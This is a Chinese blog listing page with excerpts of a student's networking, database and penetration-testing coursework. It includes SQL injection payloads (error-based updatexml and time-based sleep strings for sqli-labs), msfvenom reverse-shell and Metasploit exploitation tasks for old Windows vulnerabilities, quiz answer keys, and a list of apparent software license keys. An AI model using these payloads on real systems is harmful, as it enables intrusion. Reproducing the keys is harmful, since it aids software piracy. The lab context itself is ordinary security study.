- 博客(27)
- 收藏
- 关注
RSS订阅原创 HTTPS抓包实验
HTTPS需要客户端、服务端双方做加解密处理,需要消耗更多CPU和内存资源,相比HTTP通信,HTTPS又多了TLS握手,会消耗更多的网络资源,总体也导致HTTPS响应时间变慢。之所以搞这么麻烦,就是因为 TLS 设计者不信任客户端或服务器伪随机数的可靠性,为了保证真正的完全随机,把三个不可靠家伙混合起来,随机的程度就非常高了,安全性也就更高。,TLS相对于SSL 3.0版本做了些修改和功能增强,相当于SSL的升级版本,所以有时也一起统称为 SSL,接入来本文若不明显强调,SSL就默认表示SSL/TLS。
2025-01-06 16:01:06
842
原创 HTTP抓包实验
接下来主要按四个过程进行介绍,针对过程1(三次握手建立连接)和过程4(四次挥手断开连接),在博主的前期文章中《结合Wireshark抓包实战,图文详解TCP三次握手及四次挥手原理》已经详细图解,这次主要针对过程2和过程3进行详解。这种设置可以提高服务器的响应效率,减少TCP连接的建立和断开的开销,特别是在处理大量并发请求的场景下。请求完成后,客户端和服务器可以关闭连接。:服务器响应的内容,通常是一个HTML页面的代码或者给客户端的数据,上图中可以看到本次响应的内容是一个文件数据(File Data)。
2025-01-06 15:55:11
846
原创 设置路由器
请将内网虚拟机连通外网网关(192.168.100.2)的结果(ping)截屏,并将内网中的IP地址设置结果(ipconfig)同屏截图,并在图片上标识出你学号的最后两位。请将路由器的远程访问设置结果截屏,要求显示出内网与外网的网段,同时将路由器的IP地址设置结果(ipconfig)与此同屏截图,并在图片上标识出你学号的最后两位。② 内网设置为VMnet2,网段为192.168.学号.0,这里的学号指的是学号的最后两位,以下相同。3. 必答 [简答题]4. 必答 [简答题]5. 必答 [简答题]
2024-12-19 11:30:12
341
原创 kali命令
sudo ifconfig eth0 sudo vim /etc/resolv.confsudo route add default gw
2024-12-19 11:27:44
313
原创 Less-2、3、4、5、6
id=1' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe 判断表名:?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails'limit 0,1),0x7e),1)-- qwe 这里以emails表为例子。
2024-12-18 23:40:53
681
原创 制作脚本攻击
运用msfvenom制作攻击脚本,将payload设置为Windows/meterpreter/reverse_tcp,lport设置为5000+你的学号的后两位(如你的学号为01,则端口号设置为5001),输出文件格式为exe,输出文件放置为桌面上。我的答案:首先用getuid得到的将会是普通用户的权限,当使用getsystem提升权限后再次使用getuid,得到的将会是系统级别的最高权限。将木马攻击的结果截图,即得到的meterpreter会话,用getuid查看你登陆目标机的用户名。
2024-12-18 23:35:00
339
原创 Less-8、9、11、12、18
我的答案:判断库名长度:?id=1' and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) --qwe(延时响应,说明数据库的第一个表的名字的第一位是e) 以此类推 判断字段名:?② 写出注入攻击中每一关键步骤的注入语句,并附上简要的文字,说明所使用的攻击策略,并将最终爆库的执行结果截图上传,
2024-12-18 22:56:21
414
原创 ms12-020
(MS12-020漏洞利用原理:微软的远程桌面协议(RDP)是一个多通道的协议,让用户连上远程电脑。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,使目标机出现蓝屏。(2)在Kali端利用Metaspliot对Server进行渗透测试,将渗透测试的每个详细步骤以及渗透成功的结果截图。(1)在Kali端运用Nmap查看Server端是否开启3389端口,将完整命令和运行结果截图。(3)为了防范MS12-020漏洞被利用,你认为有哪些可行的措施?
2024-12-18 22:54:33
247
原创 ms08-067
开启虚拟机Kali和Server2003,将Kali和Server2003放置在同一个网段中,将Kali 的IP设置为192.168.学号.3,将Server2003的IP设置为192.168.学号.12。(注:此处的学号为你学号的后两位)
2024-12-18 22:51:13
153
原创 ms10-087
在kali中利用ms10-087漏洞对Win7(必须包含office)进行渗透测试,将关键的实验步骤截图(包括payload的设置、参数的设置、实验结果等)。要求:将rtf文件名设置为你的名字的全拼;设置payload为:payload/windows/shell/reverse_tcp。
2024-12-18 22:46:07
195
原创 ms14-064
在kali中利用ms14-064漏洞对WIN7进行渗透测试,将关键的实验步骤截图(包括payload的设置、参数的设置、实验结果等),要求将URIPATH设置为你的学号。
2024-12-18 22:43:09
149
原创 【无标题】网络攻防章节测试
1【单选题】在以上的网络拓扑结构中,需要设置Router(172.16.1.1/10.10.10.2)的静态路由,当目标为192.168.2.0时,其中的网关需要填写的IP地址应是:A、B、C、D、我的答案:D5.0分正确答案:D答案解析:设置静态路由就是告诉这台路由器,当要访问某一个目标网段(192.168.2.0)中的IP时,要先将请求发送到目标网段的路由器上,而且是这台路由器能访问到的IP地址,因此这里的网关就是目标网段的路由器在外网的IP地址(10.10.10.1)2。
2024-12-17 10:11:30
1089
原创 【产品内部密钥】
jb9yh-p2jyp-dwvjb-2mt4m-y4cmbjcc6d-3k4p6-cptxj-xhjxm-fhfdyjb9tg-mx2hb-9hwvk-gh8k6-38bqyjb8b2-4228d-yvwhk-vj87m-ck8ybjb8c4-xdfmh-f3dj9-c4fyy-fdrdyjcf4c-pmt8r-v8q2j-th77k-tbt7mjcfxb-jv2md-4mjty-xmx64-mrmqyjcdfb-dk2bg-v76rc-hwwj2-3373yjcffw-6myrg-cwdb
2024-07-05 13:09:03
417
原创 【数据库随堂练习】
我的答案: SELECT T.Tno,T.Tname,T.Dno FROM Teachers AS T WHERE T.Tno IN( SELECT T.Tno FROM Teachers AS T,Tutors AS Tut,Department AS D WHERE T.Tno=Tut.Tno AND Substring(Tut.Sclass,5,2)=D.Dno AND D.Dname='物理与电子工程学院' )在关系代数的专门关系运算中,从表中取出满足条件的属性的操作称为____;
2024-07-04 23:12:42
834
1
原创 【数据库章节检测】
1【单选题】数据库管理系统能实现对数据库中数据的查询、插入、修改和删除等操作的数据库语言称为A、B、C、D、我的答案:B6.6分正确答案:B2【单选题】DBS的三级模式结构中,最接近外部存储器的是_______。A、B、C、D、我的答案:C6.6分正确答案:C3【单选题】数据库管理系统内部提供了二级映像,其中外模式/模式映像A、B、C、D、我的答案:D6.6分正确答案:D知识点:4【单选题】数据库中,数据的物理独立性是指_______。A、B、C、D、
2024-07-04 20:34:28
812
转载 数据库代码
若某门课程有人选,但平均分等结果为NULL,则显示为’尚无成绩’;SELECT '2016115105' AS '学号','2017' AS '学年','2' AS '学年',IFNULL(@CRE,'0') AS '已获学分',IFNULL(@NCRE,'0') AS '未获学分';SELECT '2014112104' AS '学号','2014' AS '学年','1' AS '学年',IFNULL(@CRE,'0') AS '已获学分',IFNULL(@NCRE,'0') AS '未获学分';
2024-07-04 20:30:53
387
原创 【物理层】
站点 A、B、C 通过 CDMA 共享链路,A、B、C 的码片序列(chipping sequence)分别是(1,1,1,1)、(1,-1,1,-1) 和(1,1,-1,-1)。站点 A、B、C 通过 CDMA 共享链路,A、B、C 的码片序列(chipping sequence)分别是(1,1,1,1)、(1,-1,1,-1) 和(1,1,-1,-1)。(2,0,2,0,0,-2,0,-2,0,2,0,2),则 C 收到 A 发送的数据是( )。A:NRZ 和曼彻斯特编码;A:NRZ 和曼彻斯特编码;
2024-07-02 12:16:27
1758
原创 【数据链路层】
CSMA/CD 是总线型以太网使用的数据链路层协议,由于有线传输信道的质量较高,因此并不要求使用额外的机制来确保可靠传输,如果发生帧的误码,接收方直接丢弃误码的帧,其他什么也不做。网络拓扑如下图所示,假设交换机的帧交换表初始为空,主机A给B发送数据帧,主机B收到后给A发送确认帧,则图中能收到数据帧的主机数量和能收到确认帧的主机数量分别是()。网络拓扑如下图所示,假设交换机当前转发表为空,主机B给C发送1个数据帧,主机C收到该帧后,向主机B发送1个确认帧,交换机对这两个帧的转发端口分别是()。
2024-07-02 12:14:54
997
原创 【网络层】
我的答案:正确答案:答案解析:将 10.0.0.0 的左起前 10 个比特保持不变,然后:将剩余 22 个比特全部清 0,就可以得到地址块中的第一个地址,结果为 10.0.0.0将剩余 22 个比特全部置 1,就可以得到地址块中的最后一个地址,结果为 10.63.255.255。
2024-07-02 12:02:15
2471
原创 【标题】传输层
TCP 是面向字节流的,在未收到对方确认之前,可将序号落入发送窗口内的所有字节数据全部发送出去。C:TCP传输连接的释放过程很复杂,只有客户端可以主动提出释放连接的请求;C:TCP传输连接的释放过程很复杂,只有客户端可以主动提出释放连接的请求;B:单方面释放连接,表示本方已经无数据发送,但可以接收对方的数据;B:单方面释放连接,表示本方已经无数据发送,但可以接收对方的数据;B:UDP长度字段是UDP数据报的长度,包括伪首部的长度;B:UDP长度字段是UDP数据报的长度,包括伪首部的长度;
2024-07-02 12:00:21
907
原创 【标题】应用层
局域网内主机访问Internet上各服务器的往返时间RTT均为10ms,忽略其他各种时延,若主机通过超链接http://www.abc.com/index.html,请求浏览纯文本Web页index.html,则从点击超链接开始到浏览器接收到index.html页面为止,所需最短、最长时间分别是( )。当下图中的H4访问规范域名为www.abc.xyz.com的网站时,域名服务器201.1.1.1在完成该域名解析过程中,可能发出DNS查询的最少和最多次数分别是( )。C:最开始连接的服务器;
2024-07-02 11:59:02
728
原创 【无标题】综合体
当路由表中有多条匹配的路由条目时,按“最长前缀匹配”的原则进行匹配,第 1 条路由条目的前缀为/22,第 2 条路由条目的前缀为/25,因此第 2 条路由条目匹配,按其指示,从接口 S1 进行转发。当路由表中有多条匹配的路由条目时,按“最长前缀匹配”的原则进行匹配,第 1 条路由条目的前缀为/22,第 2 条路由条目的前缀为/25,因此第 2 条路由条目匹配,按其指示,从接口 S1 进行转发。目的网络 206.0.71.128 的左起前 25 个比特比较,结果是相同的,表明第 2 条路由条目是匹配的;
2024-07-02 11:48:22
1612
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人